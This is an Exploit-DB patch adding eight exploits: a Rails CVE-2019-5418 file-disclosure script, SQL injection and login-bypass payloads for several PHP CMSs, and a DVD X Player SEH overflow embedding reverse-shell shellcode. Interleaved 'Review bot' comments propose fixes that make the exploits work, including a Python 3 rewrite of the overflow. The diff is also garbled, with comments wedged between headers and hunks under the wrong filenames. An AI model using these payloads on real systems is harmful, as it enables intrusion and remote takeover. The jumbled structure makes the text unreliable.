From 34e4bc14d91c54af50507d56a3ee77ebbe7bd8b2 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 22 Mar 2019 05:02:11 +0000
Subject: [PATCH] DB: 2019-03-22

8 changes to exploits/shellcodes

Canarytokens 2019-03-01 - Detection Bypass
DVD X Player 5.5.3 - '.plf' Buffer Overflow
Netartmedia Vlog System - 'email' SQL Injection
Rails 5.2.1 - Arbitrary File Content Disclosure
The Company Business Website CMS - Multiple Vulnerabilities
uHotelBooking System - 'system_page' SQL Injection
Placeto CMS Alpha v4 - 'page' SQL Injection
Bootstrapy CMS - Multiple SQL Injection
---
 exploits/multiple/webapps/46585.py | 73 ++++++++++++++++++++++++++++++
 exploits/php/webapps/46583.txt | 13 ++++++
 exploits/php/webapps/46586.txt | 31 +++++++++++++
 exploits/php/webapps/46587.txt | 17 +++++++
 exploits/php/webapps/46588.txt | 36 +++++++++++++++
 exploits/php/webapps/46590.txt | 36 +++++++++++++++
 exploits/windows/dos/46589.php | 37 +++++++++++++++
 exploits/windows/local/46584.py | 64 ++++++++++++++++++++++++++
 files_exploits.csv | 8 ++++
 9 files changed, 315 insertions(+)
 create mode 100755 exploits/multiple/webapps/46585.py
 create mode 100644 exploits/php/webapps/46583.txt
 create mode 100644 exploits/php/webapps/46586.txt
 create mode 100644 exploits/php/webapps/46587.txt
 create mode 100644 exploits/php/webapps/46588.txt
 create mode 100644 exploits/php/webapps/46590.txt
 create mode 100644 exploits/windows/dos/46589.php
 create mode 100755 exploits/windows/local/46584.py

diff --git a/exploits/multiple/webapps/46585.py b/exploits/multiple/webapps/46585.py
new file mode 100755
index 000000000..b928a7f78
--- /dev/null
+++ b/exploits/multiple/webapps/46585.py
@@ -0,0 +1,73 @@
+'''
+Exploit Title: File Content Disclosure on Rails
+Date: CVE disclosed 3/16 today's date is 3/20
+Exploit Author: NotoriousRebel
+Vendor Homepage: https://rubyonrails.org/
+Software Link: https://github.com/rails/rails
+Version: Versions Affected: all Fixed Versions: 6.0.0.beta3, 5.2.2.1, 5.1.6.2, 5.0.7.2, 4.2.11.1
+Tested on: Rails 5.2.1 (Using ubuntu on linux subsystem for Windows)
+CVE: 2019-5418
+'''
+import sys
+
+try:
+    import requests
+except ImportError:
+    print('\n\033[93m[!] Requests library not found, please install before proceeding.\n\n \033[0m')
+    sys.exit(1)
+
+
+def banner():
+    banner = """
+    ----------------------------------------------
+    Arbitrary Traversal exploit for Ruby on Rails
+    CVE-2019-5418
+    ----------------------------------------------
+    """
+    print(banner)
+
+def check_args():
+    if len(sys.argv) != 2:
+        print("Invalid number of arguments entered!")
+        how_to_use = "python3 Bandit.py url"
+        print('Use as:', how_to_use)
+        sys.exit(1)
+
+
+def check_url(url):
+    status_code = requests.get(url)
+    if status_code != 200:
+        print("Url is invalid or can not be reached!")
+        sys.exit(1)
+
+
+def read_file(url, file):
+    headers = {'Accept': file + '{{'}
+    req = requests.get(url, headers=headers)
+    return req
+
+
+def main():
+    banner()
+    check_args()
+    url = sys.argv[1]
+    while True:
+        try:
+            file = input("Enter file to read (enter quit to exit): ")
+        except Exception:
+            file = raw_input("Enter file to read (enter quit to exit): ")
+        try:
+            if file.lower() == 'quit':
+                break
+        except Exception:
+            if file == 'quit':
+                break
+        response = read_file(url, file)
+        print(response.text)
+
+
+if __name__ == '__main__':
+    try:
+        main()
+    except KeyboardInterrupt:
+        print('\n\n\033[93m[!] ctrl+c detected from user, quitting.\n\n \033[0m')
\ No newline at end of file
diff --git a/exploits/php/webapps/46583.txt b/exploits/php/webapps/46583.txt
new file mode 100644
index 000000000..e76587994
--- /dev/null
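Review bot: `check_url` can never pass: `status_code = requests.get(url)` binds the `Response` object and `status_code != 200` compares that object with an int, so it exits on every URL — and `main` never calls it anyway, so the check is dead code. Fix the comparison and wire it in: `resp = requests.get(url, timeout=10)` / `if resp.status_code != 200:`, then call `check_url(url)` right after `url = sys.argv[1]`. The interactive loop calls `input()` first and only falls back to `raw_input()` on an exception, which on Python 2 means the typed text is evaluated as an expression before the fallback is ever reached; resolve the reader once (`try: read_line = raw_input` / `except NameError: read_line = input`) or drop Python 2 support together with the usage string `python3 Bandit.py url`, which does not name this file either. `read_file` also issues `requests.get` with no `timeout`, so an unresponsive target blocks the loop indefinitely. As I understand CVE-2019-5418, the `Accept: <path>{{` trick only fires on an action that renders with `render file:`, so "Versions Affected: all" in the docstring overstates what the script can reach; a sentence saying the target URL must be such an action would stop users from reading an ordinary 200 as "not vulnerable".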
+++ b/exploits/php/webapps/46583.txt
@@ -0,0 +1,13 @@
+# Exploit Title: Netartmedia Vlog System - 'email' SQL Injection
+# Date: 20.03.2019
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor Homepage: https://www.netartmedia.net/vlogsystem/
+# Demo Site: https://www.phpscriptdemos.com/vlogs/
+# Version: Lastest
+# Tested on: Kali Linux
+# CVE: N/A
+----- PoC: SQLi -----
+# Request: http://localhost/[PATH]/index.php
+# Vulnerable Parameter: email (POST)
+# Attack
+Pattern: ProceedSend=1&email=-1'%20OR%203*2*1=6%20AND%20000371=000371%20--%20&mod=forgotten_password
\ No newline at end of file
diff --git a/exploits/php/webapps/46586.txt b/exploits/php/webapps/46586.txt
new file mode 100644
index 000000000..df0090419
--- /dev/null
+++ b/exploits/php/webapps/46586.txt
@@ -0,0 +1,31 @@
+# Exploit Title: The Company Business Website CMS - 'user_name' SQL
+Injection
+# Date: 20.03.2019
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor Homepage: https://www.codester.com/items/6806/the-company-business-website-cms
+# Demo Site: http://thecompany.morkocbilisim.com
+# Version: Lastest
+# Tested on: Kali Linux
+# CVE: N/A
+
+----- PoC: SQLi -----
+
+Request: http://localhost/[PATH]/admin/production/login.php
+Vulnerable Parameter: user_name (POST)
+Payload: user_name=VNfn' UNION ALL SELECT
+NULL,NULL,NULL,CONCAT(CONCAT('qqkxq','mOiFXJaJzzATyiPlJyQgwuuTiDddtckLMPRRRdEH'),'qjbbq'),NULL,NULL,NULL,NULL--
+WMfV&user_password=&loggin=Psop
+
+
+# Exploit Title: The Company Business Website CMS - Authentication Bypass
+# Date: 20.03.2019
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor Homepage: https://www.codester.com/items/6806/the-company-business-website-cms
+# Demo Site: http://thecompany.morkocbilisim.com
+# Version: Lastest
+# Tested on: Kali Linux
+# CVE: N/A
+----- PoC: Authentication Bypass -----
+Administration Panel: http://localhost/[PATH]/admin/production/login.php
+Username: '=' 'or'
+Password: '=' 'or'
\ No newline at end of file
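Review bot: The PoC gives only the true-branch payload (`-1' OR 3*2*1=6 AND 000371=000371 -- `) and never says which response difference marks success, so a reader cannot tell a blind injection apart from the password-reset form simply accepting any address; add the false counterpart (e.g. `3*2*1=7`) and a line such as `# Expected: true payload -> reset page, false payload -> unknown-address error`, filled in with whatever was actually observed. `# Version: Lastest` is both a typo and unpinned — record the version string shipped on the test date so the finding can be re-verified once the vendor releases a fix. The `# Attack` / `Pattern:` split also reads as a wrapped line rather than two header fields and should be joined back to `# Attack Pattern:`.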
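Review bot: The authentication-bypass PoC (`Username: '=' 'or'` / `Password: '=' 'or'`) presumably only succeeds because the submitted password is interpolated raw into the SQL string, i.e. the login compares plaintext passwords inside the query instead of hashing first — that is a second, separate weakness the write-up should state explicitly, since a hash-then-compare login would defeat this bypass but not the `user_name` injection. The UNION payload with its `qqkxq…qjbbq` markers is a sqlmap artifact; a reader needs to know the column count is 8 and where in the login response the concatenated value is echoed, e.g. `# Injected string is reflected in the login error message` if that is what was seen. The title line is wrapped mid-field (`'user_name' SQL` / `Injection`) and `Version: Lastest` is unpinned, both worth fixing before the entry is indexed.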
diff --git a/exploits/php/webapps/46587.txt b/exploits/php/webapps/46587.txt
new file mode 100644
index 000000000..1a40dd10a
--- /dev/null
+++ b/exploits/php/webapps/46587.txt
@@ -0,0 +1,17 @@
+# Exploit Title: uHotelBooking System - 'system_page' SQL Injection
+# Date: 21.03.2019
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor Homepage: https://www.hotel-booking-script.com
+# Demo Site: https://www.hotel-booking-script.com/demo/
+# Version: Lastest
+# Tested on: Kali Linux
+# CVE: N/A
+# Description: uHotelBooking is a powerful hotel management and online
+booking/reservation site script.
+
+----- PoC: SQLi -----
+
+Request: http://localhost/[PATH]/index.php
+Vulnerable Parameter: system_page (GET)
+Attack Pattern:
+http://locahost/[PATH]/index.php?page=3&system_page=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z
\ No newline at end of file
diff --git a/exploits/php/webapps/46588.txt b/exploits/php/webapps/46588.txt
new file mode 100644
index 000000000..9c8861764
--- /dev/null
+++ b/exploits/php/webapps/46588.txt
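Review bot: The attack pattern URL reads `http://locahost/[PATH]/…` (missing `l`), so anyone pasting the PoC gets a DNS failure instead of the expected delay; it should be `http://localhost/[PATH]/index.php?page=3&system_page=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z`. A single time-based payload is weak evidence on its own; a note on the control measurement (e.g. `# Baseline response ~0.2s, with payload ~5.2s`, using the numbers actually observed) and on the MySQL-only nature of `sleep()`/`sysdate()` would make it reproducible. `# Version: Lastest` pins nothing — record the version that was tested.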
@@ -0,0 +1,36 @@
+Placeto CMS Alpha v4 - 'page' SQL Injection
+
+# Title: Placeto CMS
+# Date: 21.03.2019
+# Exploit Author: Abdullah Çelebi
+# Vendor Homepage: https://sourceforge.net/projects/placeto/
+# Software Link: https://sourceforge.net/projects/placeto/files/alpha-rv.4/placeto.zip
+# Version: Alpha rv.4
+# Category: Webapps
+# Tested on: WAMPP @Win
+# Software description:
+A lightweight, easy to use PHP content management system (CMS). Written to
+be fast and to use as little memory as possible. Placeto CMS offers browser
+and server caching, provides gzip compression and to cut down on bandwidth
+and CPU time.
+
+# Vulnerabilities:
+# An attacker can access all data following an authorized user login using
+the parameter.
+
+
+# POC - SQLi :
+
+# Parameter: page (GET)
+# Request URL: http://localhost/placeto/admin/edit.php?page=key
+
+# Type : boolean-based blind
+page=JyI" AND 1647=1647 AND "svwN"="svwN
+
+# Type : time-based blind
+page=JyI" AND SLEEP(5) AND "uIvY"="uIvY
+
+# Type : union query
+page=-8388" UNION ALL SELECT
+NULL,CONCAT(0x716b627671,0x6a636f485445445466517a4a6f6972635551635179725550617072647371784f6445576b74736849,0x716b6b6b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
+CbSf
\ No newline at end of file
diff --git a/exploits/php/webapps/46590.txt b/exploits/php/webapps/46590.txt
new file mode 100644
index 000000000..687992ea1
--- /dev/null
+++ b/exploits/php/webapps/46590.txt
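Review bot: The write-up's own description says the injection is reachable "following an authorized user login" and the request is `/admin/edit.php`, so this is a post-authentication admin-panel SQLi — the title `Placeto CMS Alpha v4 - 'page' SQL Injection` (and the CSV row built from it) should carry `Authenticated` so the severity is not overstated. The `page=JyI" AND …` payloads show the parameter lands inside a double-quoted string and the union payload has 10 columns; a one-line note on that context would save the next reader a sqlmap run. The description line `using the parameter.` is truncated and should name `page`.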
@@ -0,0 +1,36 @@
+# Exploit Title: Bootstrapy CMS - Multiple SQL Injection
+# Date: 21.03.2019
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor Homepage: http://bootstrapy.com
+# Demo Site: http://bootstrapy.net/demo/
+# Version: Lastest
+# Tested on: Kali Linux
+# CVE: N/A
+
+----- PoC 1: SQLi -----
+
+Request: http://localhost/[PATH]/modules/forums/forum-thread.php
+Vulnerable Parameter: thread_id (POST)
+Attack Patten:
+search=&thread_id=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z
+
+----- PoC 2: SQLi -----
+
+Request: http://localhost/[PATH]/modules/pages/contact-submit.php
+Vulnerable Parameter: subject (POST)
+Attack Pattern:
+email=sample%40email.tst&message=20&name=wUmrLVWz&subject=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z&submit=
+
+----- PoC 3 - SQLi -----
+
+Request: http://localhost/[PATH]/modules/forums/post-new-submit.php
+Vulnerable Parameter: post-id
+Attack Pattern:
+body=1&post-id=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z"e=1&submit=&thread-id=1
+
+----- PoC 4 - SQLi -----
+
+Request: http://localhost/[PATH]/modules/forums/post-new-submit.php
+Vulnerable Parameter: thread-id (POST)
+Attack Pattern:
+quote=0&reply=1&submit=&thread-id=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z
\ No newline at end of file
diff --git a/exploits/windows/dos/46589.php b/exploits/windows/dos/46589.php
new file mode 100644
index 000000000..26c6cf174
--- /dev/null
+++ b/exploits/windows/dos/46589.php
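Review bot: PoC 3's body `…XOR'Z"e=1&submit=&thread-id=1` looks like `&quote=1` pushed through an HTML-entity decoder (`&quot` → `"`), which matches the `quote=0` field PoC 4 sends to the same endpoint; as written the request loses the `quote` parameter and gains a stray `"`, so it should read `body=1&post-id=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z&quote=1&submit=&thread-id=1`. PoC 4 uses `sleep(0)`, which cannot produce an observable delay and therefore demonstrates nothing — presumably `sleep(5)` like the other three. `Attack Patten:` in PoC 1 is a typo and PoC 3 omits the `(POST)` method tag the other entries carry.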
@@ -0,0 +1,37 @@
+## Exploit Title: Canarytokens 2019-03-01 - Detection Bypass
+# Date: 20.03.2019
+# Exploit Author: Benjamin Zink Loft, Gionathan "John" Reale
+# Vendor Homepage: https://thinkst.com/
+# Version: up to 2019-03-01
+# Software Link: https://github.com/thinkst/canarytokens
+# Google Dork: N/A
+# CVE: 2019-9768
+#==================================================================================================================================================================================
+# PoC:
+#
+#
+#
+# Requires unzip:
+#
+# sudo apt-get install unzip
+#
+#
+
+
+
\ No newline at end of file
diff --git a/exploits/windows/local/46584.py b/exploits/windows/local/46584.py
new file mode 100755
index 000000000..6914da281
--- /dev/null
+++ b/exploits/windows/local/46584.py
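Review bot: As reproduced here the hunk has no PoC body at all — after `# Requires unzip:` / `# sudo apt-get install unzip` only empty lines follow, although the header declares 37 added lines; most likely the `<?php … ?>` block was dropped when this page was rendered, so the file must be checked against the repository rather than this view. What is visible is internally inconsistent: the path `exploits/windows/dos/` and the CSV row classify it as a Windows denial-of-service, while the only setup step is Debian `apt-get` and the title is a detection bypass of a web service — a `# Platform:` / `# Category:` line stating the real target would help the indexer. `# CVE: 2019-9768` also drops the `CVE-` prefix that 46584.py in this same patch uses and that tooling greps for.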
@@ -0,0 +1,64 @@
+#!/usr/bin/env python
+
+# Exploit Title: DVD X Player 5.5.3 Buffer Overflow
+# Date: 20.03.2019
+# Exploit Author: Paolo Perego - paolo@armoredcode.com
+# Vendor Homepage: http://www.dvd-x-player.com
+# Software Link: http://www.dvd-x-player.com/download/DVDXPlayerSetup-Standard.exe
+# Version: 5.5.3.8 and above
+# Tested on: Windows 7 Professional SP1 x86
+# CVE : CVE-2018-9128
+# Similiar EDB-ID: 44438 https://www.exploit-db.com/exploits/44438
+# In Windows 7, SEH handler to be used contains a \x00 byte that it has been
+# obtained using a restricted char. For such a reason, every jump has to be
+# backward on the beginning of attacking shellcode.
+
+# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.106 LPORT=4444 -b '\x00\x0a\x1a\x0d' -f py -v shellcode
+
+shellcode = ""
+shellcode += "\xb8\xb8\xfa\xed\xbb\xda\xc1\xd9\x74\x24\xf4\x5a"
+shellcode += "\x33\xc9\xb1\x52\x31\x42\x12\x03\x42\x12\x83\x7a"
+shellcode += "\xfe\x0f\x4e\x86\x17\x4d\xb1\x76\xe8\x32\x3b\x93"
+shellcode += "\xd9\x72\x5f\xd0\x4a\x43\x2b\xb4\x66\x28\x79\x2c"
+shellcode += "\xfc\x5c\x56\x43\xb5\xeb\x80\x6a\x46\x47\xf0\xed"
+shellcode += "\xc4\x9a\x25\xcd\xf5\x54\x38\x0c\x31\x88\xb1\x5c"
+shellcode += "\xea\xc6\x64\x70\x9f\x93\xb4\xfb\xd3\x32\xbd\x18"
+shellcode += "\xa3\x35\xec\x8f\xbf\x6f\x2e\x2e\x13\x04\x67\x28"
+shellcode += "\x70\x21\x31\xc3\x42\xdd\xc0\x05\x9b\x1e\x6e\x68"
+shellcode += "\x13\xed\x6e\xad\x94\x0e\x05\xc7\xe6\xb3\x1e\x1c"
+shellcode += "\x94\x6f\xaa\x86\x3e\xfb\x0c\x62\xbe\x28\xca\xe1"
+shellcode += "\xcc\x85\x98\xad\xd0\x18\x4c\xc6\xed\x91\x73\x08"
+shellcode += "\x64\xe1\x57\x8c\x2c\xb1\xf6\x95\x88\x14\x06\xc5"
+shellcode += "\x72\xc8\xa2\x8e\x9f\x1d\xdf\xcd\xf7\xd2\xd2\xed"
+shellcode += "\x07\x7d\x64\x9e\x35\x22\xde\x08\x76\xab\xf8\xcf"
+shellcode += "\x79\x86\xbd\x5f\x84\x29\xbe\x76\x43\x7d\xee\xe0"
+shellcode += "\x62\xfe\x65\xf0\x8b\x2b\x29\xa0\x23\x84\x8a\x10"
+shellcode += "\x84\x74\x63\x7a\x0b\xaa\x93\x85\xc1\xc3\x3e\x7c"
+shellcode += "\x82\x2b\x16\x46\x38\xc4\x65\xb6\xad\x48\xe3\x50"
+shellcode += "\xa7\x60\xa5\xcb\x50\x18\xec\x87\xc1\xe5\x3a\xe2"
+shellcode += "\xc2\x6e\xc9\x13\x8c\x86\xa4\x07\x79\x67\xf3\x75"
+shellcode += "\x2c\x78\x29\x11\xb2\xeb\xb6\xe1\xbd\x17\x61\xb6"
+shellcode += "\xea\xe6\x78\x52\x07\x50\xd3\x40\xda\x04\x1c\xc0"
+shellcode += "\x01\xf5\xa3\xc9\xc4\x41\x80\xd9\x10\x49\x8c\x8d"
+shellcode += "\xcc\x1c\x5a\x7b\xab\xf6\x2c\xd5\x65\xa4\xe6\xb1"
+shellcode += "\xf0\x86\x38\xc7\xfc\xc2\xce\x27\x4c\xbb\x96\x58"
+shellcode += "\x61\x2b\x1f\x21\x9f\xcb\xe0\xf8\x1b\xf5\x11\x30"
+shellcode += "\xb6\x62\x88\xa1\xfb\xee\x2b\x1c\x3f\x17\xa8\x94"
+shellcode += "\xc0\xec\xb0\xdd\xc5\xa9\x76\x0e\xb4\xa2\x12\x30"
+shellcode += "\x6b\xc2\x36"
+
+junk = "\x90" * (600 -len(shellcode))
+junk += shellcode
+
+# nasm > jmp $-400
+# 00000000 E96BFEFFFF jmp 0xfffffe70
+backflip="\x90\x90\x90\xE9\x6B\xFE\xFF\xFF"
+junk += backflip
+
+# 00401838 |. 5E POP ESI
+junk += "\xeb\xf6\x90\x90"
+junk += "\x38\x18\x40\x1a"
+
+file = open("evil_playlist.plf", "w")
+file.write(junk)
+file.close()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 80de45bd2..bc0cbf7ae 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
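Review bot: The playlist is written in text mode (`open("evil_playlist.plf", "w")`) from `str` literals such as `"\xb8\xb8\xfa…"`; under Python 3, which `#!/usr/bin/env python` resolves to on current systems, every byte ≥ 0x80 is UTF-8 encoded to two bytes, so the 600-byte offset, the `jmp $-400` and the SEH record all land in the wrong place — use `b"…"` literals and `"wb"`. There is also no guard that the payload still fits the layout: `"\x90" * (600 -len(shellcode))` silently becomes empty if a regenerated shellcode exceeds 600 bytes, and by my arithmetic the `E9 6B FE FF FF` jump at offset 603 lands at offset 203, which is only inside the NOP sled while the shellcode is ≤ 396 bytes, so an assert is worth adding. The header says the SEH address needs a `\x00` byte "obtained using a restricted char", yet the record used is `\x38\x18\x40\x1a` and `\x1a` is in the msfvenom bad-char list on the line above — a sentence explaining how `\x1a` ends up as `\x00` (if that is what happens) would make the comment match the code. The `file` name shadows the builtin as well; a `with` block removes the manual `close()`.
```python
# … unchanged: header comments and msfvenom invocation …
shellcode = b""
shellcode += b"\xb8\xb8\xfa\xed\xbb\xda\xc1\xd9\x74\x24\xf4\x5a"
# … unchanged: remaining shellcode lines, each as a b"…" literal …

# The jmp at offset 603 lands at offset 203; keep that inside the NOP sled.
assert len(shellcode) <= 396, "shellcode too long: jmp $-400 would land inside it"
junk = b"\x90" * (600 - len(shellcode))
junk += shellcode

# … unchanged: backflip and SEH record, as b"…" literals …

with open("evil_playlist.plf", "wb") as plf:
    plf.write(junk)
```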
@@ -6366,6 +6366,7 @@ id,file,description,date,author,type,platform,port
 46569,exploits/windows/dos/46569.txt,"Microsoft Edge - Flash click2play Bypass with CObjectElement::FinalCreateObject",2019-03-19,"Google Security Research",dos,windows,
 46570,exploits/multiple/dos/46570.txt,"Google Chrome < M73 - MidiManagerWin Use-After-Free",2019-03-19,"Google Security Research",dos,multiple,
 46571,exploits/multiple/dos/46571.txt,"Google Chrome < M73 - FileSystemOperationRunner Use-After-Free",2019-03-19,"Google Security Research",dos,multiple,
+46589,exploits/windows/dos/46589.php,"Canarytokens 2019-03-01 - Detection Bypass",2019-03-21,"Gionathan Reale",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
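Review bot: The new row credits `"Gionathan Reale"` alone, while the file it indexes (46589.php, earlier in this patch) lists `Benjamin Zink Loft, Gionathan "John" Reale` as authors; the `author` column should match the file header, `"Benjamin Zink Loft, Gionathan Reale"` or whatever the DB's convention for co-authors is. Filing a Canarytokens detection bypass as `dos,windows,` with no port also looks doubtful next to the file's own `apt-get` setup note; confirm type and platform before the index is published.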
@@ -10372,6 +10373,7 @@ id,file,description,date,author,type,platform,port
 46552,exploits/windows/local/46552.py,"WinRAR 5.61 - Path Traversal",2019-02-22,WyAtu,local,windows,
 46561,exploits/windows/local/46561.py,"Advanced Host Monitor 11.92 beta - Local Buffer Overflow",2019-03-19,"Peyman Forouzan",local,windows,
 46578,exploits/windows/local/46578.py,"NetShareWatcher 1.5.8.0 - Local SEH Buffer Overflow",2019-03-20,"Peyman Forouzan",local,windows,
+46584,exploits/windows/local/46584.py,"DVD X Player 5.5.3 - '.plf' Buffer Overflow",2019-03-21,"Paolo Perego",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -41025,3 +41027,9 @@ id,file,description,date,author,type,platform,port
 46580,exploits/hardware/webapps/46580.txt,"PLC Wireless Router GPN2.4P21-C-CN - Incorrect Access Control",2019-03-20,"Kumar Saurav",webapps,hardware,80
 46581,exploits/hardware/webapps/46581.txt,"PLC Wireless Router GPN2.4P21-C-CN - Cross-Site Request Forgery",2019-03-20,"Kumar Saurav",webapps,hardware,80
 46582,exploits/php/webapps/46582.txt,"Netartmedia Deals Portal - 'Email' SQL Injection",2019-03-20,"Ahmet Ümit BAYRAM",webapps,php,80
+46583,exploits/php/webapps/46583.txt,"Netartmedia Vlog System - 'email' SQL Injection",2019-03-21,"Ahmet Ümit BAYRAM",webapps,php,80
+46585,exploits/multiple/webapps/46585.py,"Rails 5.2.1 - Arbitrary File Content Disclosure",2019-03-21,NotoriousRebel,webapps,multiple,
+46586,exploits/php/webapps/46586.txt,"The Company Business Website CMS - Multiple Vulnerabilities",2019-03-21,"Ahmet Ümit BAYRAM",webapps,php,80
+46587,exploits/php/webapps/46587.txt,"uHotelBooking System - 'system_page' SQL Injection",2019-03-21,"Ahmet Ümit BAYRAM",webapps,php,80
+46588,exploits/php/webapps/46588.txt,"Placeto CMS Alpha v4 - 'page' SQL Injection",2019-03-21,"Abdullah Çelebi",webapps,php,80
+46590,exploits/php/webapps/46590.txt,"Bootstrapy CMS - Multiple SQL Injection",2019-03-21,"Ahmet Ümit BAYRAM",webapps,php,80